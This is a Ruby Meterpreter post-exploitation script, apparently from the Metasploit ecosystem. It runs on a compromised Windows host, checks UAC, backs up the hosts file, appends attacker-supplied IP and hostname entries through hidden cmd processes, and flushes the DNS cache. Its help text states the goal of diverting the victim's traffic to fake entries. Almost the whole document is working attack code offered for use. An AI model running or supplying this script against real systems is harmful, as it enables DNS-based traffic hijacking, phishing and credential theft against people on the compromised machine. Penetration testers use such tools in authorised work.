#Meterpreter script for modifying the hosts file in windows #given a single entrie or several in a file and clear the #DNS cache on the target machine. #This script works with Windows 2000,Windows XP,Windows 2003, #Windows Vista and Windows 2008. #Provided: carlos_perez[at]darkoperator[dot]com #Verion: 0.1.0 #Note: in Vista UAC must be disabled to be able to perform hosts #file modifications. ################## Variable Declarations ################## session = client # Setting Arguments @@exec_opts = Rex::Parser::Arguments.new( "-h" => [ false,"Help Options." ], "-e" => [ true,"Host entry in the format of IP,Hostname."], "-l" => [ true,"Text file with list of entries in the format of IP,Hostname. One per line."] ) record = "" #Set path to the hosts file hosts = session.fs.file.expand_path("%SYSTEMROOT%")+"\\System32\\drivers\\etc\\hosts" #Function check if UAC is enabled def checkuac(session) winver = session.sys.config.sysinfo if winver["OS"] =~ (/Windows Vista/) print_status("Checking if UAC is enabled.") open_key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", KEY_READ) value = open_key.query_value("EnableLUA").data if value == 1 print_status("\tUAC is enabled") raise "Unable to continue UAC is enabbled." else print_status("\tUAC is disabled") status = false end end end #Function for adding record to hosts file def add2hosts(session,record,hosts) ip,host = record.split(",") print_status("Adding Record for Host #{host} with IP #{ip}") session.sys.process.execute("cmd /c echo #{ip}\t#{host} >> #{hosts}",nil, {'Hidden' => true}) end #Make a backup of the hosts file on the target def backuphosts(session,hosts) random = sprintf("%.5d",rand(100000)) print_status("Making Backup of the hosts file.") session.sys.process.execute("cmd /c copy #{hosts} #{hosts}#{random}.back",nil, {'Hidden' => true}) print_status("Backup loacated in #{hosts}#{random}.back") end # Clear DNS Cached entries def cleardnscach(session) print_status("Clearing the DNS Cache") session.sys.process.execute("cmd /c ipconfig /flushdns",nil, {'Hidden' => true}) end #Help Message def helpmsg puts "This Meterpreter script is for adding entries in to the Windows Hosts file." puts "Since Windows will check first the Hosts file instead of the configured DNS Server" puts "it will assist in diverting traffic to the fake entry or entries. Either a single" puts "entry can be provided or a series of entries provided a file with one per line." puts @@exec_opts.usage puts "Example:\n\n" puts "run hostsedit -e 127.0.0.1,google.com\n" puts "run hostsedit -l /tmp/fakednsentries.txt\n\n" end @@exec_opts.parse(args) { |opt, idx, val| case opt when "-e" checkuac(session) backuphosts(session,hosts) add2hosts(session,val,hosts) cleardnscach(session) when "-l" checkuac(session) if not ::File.exists?(val) raise "File #{val} does not exists!" else backuphosts(session,hosts) ::File.open(val, "r").each_line do |line| add2hosts(session,line.chomp,hosts) end cleardnscach(session) end when "-h" helpmsg end } if args.length == 0 helpmsg end